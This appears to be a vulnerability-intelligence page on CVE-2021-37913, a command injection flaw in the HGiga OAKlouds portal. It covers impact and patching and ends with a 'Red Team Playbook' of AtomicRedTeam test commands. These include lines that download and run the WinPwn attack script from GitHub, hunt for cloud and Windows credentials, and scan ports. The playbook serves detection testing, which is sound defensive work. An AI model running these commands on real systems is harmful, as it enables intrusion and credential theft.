CVE-2021-37913
Overview
This vulnerability is a command injection flaw rooted in insufficient input validation of the IPv6 Gateway parameter within the network interface card settings page of the HGiga OAKlouds OAKSv2 mobile portal. The affected component fails to sanitize special characters, allowing unfiltered input to be processed by system commands. This lack of filtering on a critical configuration parameter enables injection of arbitrary commands directly into the system execution context.
Vulnerability Description
The HGiga OAKlouds mobile portal does not filter special characters of the IPv6 Gateway parameter of the network interface card setting page. Remote attackers can use this vulnerability to perform command injection and execute arbitrary commands in the system without logging in.
Impact
An unauthenticated remote attacker can execute arbitrary system commands on the affected HGiga OAKlouds OAKSv2 device by exploiting the IPv6 Gateway parameter. This allows full control over the system, including data manipulation, service disruption, or lateral movement within the network. The vulnerability requires only network access to the portal and no user interaction, as indicated by the CVSS vector (AV:N/AC:L/PR:N/UI:N), making it highly exploitable and critical for business operations relying on the device.
Solution
According to the advisory published by the Taiwan Computer Emergency Response Team (TW-CERT) at https://www.twcert.org.tw/tw/cp-132-5092-f88e2-1.html, users of HGiga OAKlouds OAKSv2 should apply the vendor-supplied patches addressing input validation for the IPv6 Gateway parameter. The advisory details updated firmware versions that remediate the command injection flaw. Administrators are advised to follow the patch installation procedures outlined in the official advisory to ensure complete mitigation of the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the HGiga OAKlouds mobile portal arises from inadequate input validation, specifically concerning the IPv6 Gateway parameter on the network interface card settings page. This oversight allows for the injection of special characters, which can lead to command injection attacks. Command injection occurs when an attacker is able to execute arbitrary commands on the host operating system through a vulnerable application. In this case, the lack of proper filtering means that an attacker can manipulate the input to execute commands without needing to authenticate, significantly increasing the risk of exploitation.
Attackers can exploit this vulnerability through various vectors. For instance, a remote attacker could craft a malicious request to the mobile portal, injecting specially crafted input into the IPv6 Gateway field. By doing so, they could execute system-level commands that may allow them to gain unauthorized access to sensitive data, alter system configurations, or even take control of the affected system entirely. Given that the attack does not require prior authentication, it poses a severe threat, as it lowers the barrier for entry for potential attackers. Scenarios could include the extraction of user credentials, installation of malware, or even lateral movement within the network to compromise additional systems.
The real-world impact of this vulnerability can be profound, particularly for organizations relying on the HGiga OAKlouds mobile portal for critical operations. A successful exploitation could lead to data breaches, loss of sensitive information, and significant operational disruptions. The financial ramifications could be substantial, including costs associated with incident response, legal liabilities, and potential regulatory fines. Furthermore, the reputational damage resulting from a breach could erode customer trust and lead to long-term business consequences. Organizations must recognize that the implications extend beyond immediate financial losses; they can affect stakeholder confidence and market position.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. First, thorough input validation should be enforced to ensure that only expected and safe data formats are accepted. This could involve sanitizing user inputs to strip out any special characters that could be used for command injection. Additionally, employing web application firewalls (WAFs) can help monitor and filter out malicious requests before they reach the application. Regular security assessments, including penetration testing and code reviews, should be conducted to identify and remediate vulnerabilities proactively. Furthermore, organizations should maintain an updated inventory of their software and systems to ensure timely patching and updates, thereby reducing the attack surface.
In conclusion, the command injection vulnerability present in the HGiga OAKlouds mobile portal represents a critical security risk that can be exploited by remote attackers to execute arbitrary commands. The potential for significant business impact necessitates immediate attention to detection and mitigation strategies. By prioritizing input validation, employing security tools, and maintaining a proactive security posture, organizations can better protect themselves against such vulnerabilities and mitigate the associated risks.
Recent CSURFACE threat intelligence indicates a moderate increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2021-37913, reflecting a growing likelihood of exploitation attempts targeting the HGiga OAKlouds OAKSv2 mobile portal vulnerability. Although no new exploit code or active campaigns have been detected by our telemetry, the upward adjustment in EPSS suggests heightened attacker interest or improved exploitability conditions. This subtle shift signals that threat actors may be preparing or refining techniques to leverage the command injection flaw, potentially increasing the risk of unauthorized remote code execution without authentication. For defenders, this evolving risk profile underscores the importance of maintaining vigilance through continuous monitoring and threat hunting focused on anomalous command execution patterns related to IPv6 Gateway parameters. While the overall threat level remains critical due to the vulnerability’s inherent severity, the recent EPSS increase elevates the urgency for detection capabilities to anticipate exploitation attempts before they manifest in the wild.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Hgiga | Oaklouds Portal | All |
cpe:2.3:a:hgiga:oaklouds_portal:*:*:*:*:*:*:*:*
|
|
|
Hgiga | Oaklouds Portal | All |
cpe:2.3:a:hgiga:oaklouds_portal:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
58%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-37913 |
| twcert.org.tw |
GitHub CVE
x_refsource_MISC
|
https://www.twcert.org.tw/tw/cp-132-5092-f88e2-1.html |